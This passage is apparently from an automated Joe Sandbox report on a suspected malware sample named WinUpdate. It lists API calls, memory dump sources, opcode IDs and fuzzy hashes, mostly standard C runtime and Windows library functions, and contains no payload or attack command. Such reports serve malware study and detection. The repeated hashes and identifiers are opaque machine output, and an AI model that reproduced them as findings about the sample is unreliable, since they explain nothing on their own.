                                                                                                                                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1001CF06
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 1001CF0F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                                                                                • Instruction ID: 21883209d994697de3a7c675a4d248267bdfb4ce84dfd65b2647a05d58818af6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50319032A0021AABEB15CF64CC85DAE7BE6EF40750F150169FC14DA191EB35DDA1DBA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,02E66FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 02E68731
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02E687BA
                                                                                                                                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02E687CC
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 02E687D5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02E65702
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 09b783974135956a757c86e42cb3263a53da39943e06d9b35a2b4eeb744231ea
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c310d0540a945ce708590ef902fc0a14763e74f0e4be4431090f4231fb43d30
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09b783974135956a757c86e42cb3263a53da39943e06d9b35a2b4eeb744231ea
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF31C332A8021A9BDF24DF65DC98DBF7BA6EB44398F448168FC04D7150E735E954CB90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • new.LIBCMT ref: 100083A9
                                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 1000843E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 10008443
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3339364867-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                                                                                • Instruction ID: 23aa64f781752fb4dbb10d71724e045748c050331dec8ce7964fb18c31900350
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE2103B5A006035FFB18DF28C881A6EB794FB453D0B10473AE956C7259E731FB908791
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a77029f59283c4afc38e459ca5b29238c6884d098e1e5420c53c581ecba7eff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B0144B2209B26FEE61186B86CC0C1B338CDF452F67BE0325F4305E1D1EA72CD804560
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue), ref: 10016CB3
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000,00000364,?,10016B4E), ref: 10016CBF
                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000), ref: 10016CCD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                                                                                • Instruction ID: ff803806bf35457a8c9509914e7b957bc79ab392df546f2ce6f943c9b73d3fe4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A012B32215233BBD721CBA98C84E667B99EF197E17324630FE86DB140D731D892C6E0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02E61D66,00000000,00000000,?,02E65C88,02E61D66,00000000,00000000,00000000,?,02E65E85,00000006,FlsSetValue), ref: 02E65D13
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,02E65C88,02E61D66,00000000,00000000,00000000,?,02E65E85,00000006,FlsSetValue,02E6E190,FlsSetValue,00000000,00000364,?,02E65BC8), ref: 02E65D1F
                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02E65C88,02E61D66,00000000,00000000,00000000,?,02E65E85,00000006,FlsSetValue,02E6E190,FlsSetValue,00000000), ref: 02E65D2D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 25133e65a6896d86e33005382a2a82cf62709a2b6d26a8d0d37f683f567ac811
                                                                                                                                                                                                                                                                                                • Instruction ID: 50498d9ff39e8554f9ae1ef28b61389f74904ab3e33d2debbd547ce151cc621f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25133e65a6896d86e33005382a2a82cf62709a2b6d26a8d0d37f683f567ac811
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B01F736BC1222ABC7214A6AAC4CBB73799AF076F57D45A20F90AD71C1D730D851CAE0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 1000BCF1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000C329: ___AdjustPointer.LIBCMT ref: 1000C373
                                                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 1000BD08
                                                                                                                                                                                                                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 1000BD1A
                                                                                                                                                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 1000BD3E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2633735394-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                                                                                • Instruction ID: 6ee525c0efd99494f93368286b9b993f9fe821045e638fee8bb9f3aa3f758cd1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30014836000609BBEF129F55CC01EDE7BBAFF48794F118015FE1862124D772E8A1EBA0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                                                                                • Instruction ID: 219979c3f9182af5e0a522c4ab851fea51af6e4da579dc1b438f2ddc11bd8505
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF0A7F76042050EBB08E774A85792B72C8DB252E0711033AF11BCB686FD32E8D48159
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 1000C872
                                                                                                                                                                                                                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 1000C877
                                                                                                                                                                                                                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 1000C87C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000D4B2: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 1000D4C3
                                                                                                                                                                                                                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 1000C891
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1761009282-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 18d595ba6be5cc70757725346e7d2d62300b8bd13259b4a49d2a6c5daaad41ed
                                                                                                                                                                                                                                                                                                • Instruction ID: d34526af6eb8cffcc7d04472f151a01b8e2d44339627a14a79103713b5e93f66
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18d595ba6be5cc70757725346e7d2d62300b8bd13259b4a49d2a6c5daaad41ed
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35C04C1C00038A617C24FB742112D9D0341DF924C5BD594D3BC452784F9D66750F127B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10018AAC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000DAC8: IsProcessorFeaturePresent.KERNEL32(00000017,1000DA9A,1000A5B7,?,?,?,1000A5B7,00000016,?,?,1000DAA7,00000000,00000000,00000000,00000000,00000000), ref: 1000DACA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000DAC8: GetCurrentProcess.KERNEL32(C0000417,?,1000A5B7), ref: 1000DAEC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000DAC8: TerminateProcess.KERNEL32(00000000,?,1000A5B7), ref: 1000DAF3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                                                • Opcode ID: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                                                                                • Instruction ID: cadee44e4b68b609616d9b5a2801787b954e88145d2cb79ec865a40ecf5c13b6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72519275E0021ADFDB14CFA8C881AADBBF5EF48350F25816AE854EB301E635EF418B51
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E6655C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E662BC: IsProcessorFeaturePresent.KERNEL32(00000017,02E662AB,00000000,?,?,?,?,00000016,?,?,02E662B8,00000000,00000000,00000000,00000000,00000000), ref: 02E662BE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E662BC: GetCurrentProcess.KERNEL32(C0000417), ref: 02E662E0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E662BC: TerminateProcess.KERNEL32(00000000), ref: 02E662E7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                                                • Opcode ID: 955f8816f659e185f00f92218b39417c5828b33bc110d75ee76c0e922da6d05d
                                                                                                                                                                                                                                                                                                • Instruction ID: 16ebb6bb1a0e1fd4434540b84ac38a514b646252389c62e04512ffc02ebea0e9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 955f8816f659e185f00f92218b39417c5828b33bc110d75ee76c0e922da6d05d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F51A271E90209AFDF14CFA8C884ABDBBB9FF48358F249169E554E7304E7399A01CB50
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: 507a8f99fb2f8aeae77eb467a91de779bd9d22195f1c0cdebb523f72ae0d2118
                                                                                                                                                                                                                                                                                                • Instruction ID: 4af35c2643fa0229985ac1aea7182f36bb2eeb850aac5675f62255cc1c7371e4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 507a8f99fb2f8aeae77eb467a91de779bd9d22195f1c0cdebb523f72ae0d2118
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD41D3317043058BAB24CE58E8848AFB3E9FF916D7321492EF542C7618DB32E9448BA1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 100055E1
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 100055EB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                                                                                • Instruction ID: 2f3713a405c0175dfbb4312078a92c0e6100ffda4a0d56c92506938931a9961d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7931C835704B408FF724CE5CACA0A1BB3E7EB406D7B610A2DF592CB695D762ED4087A1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
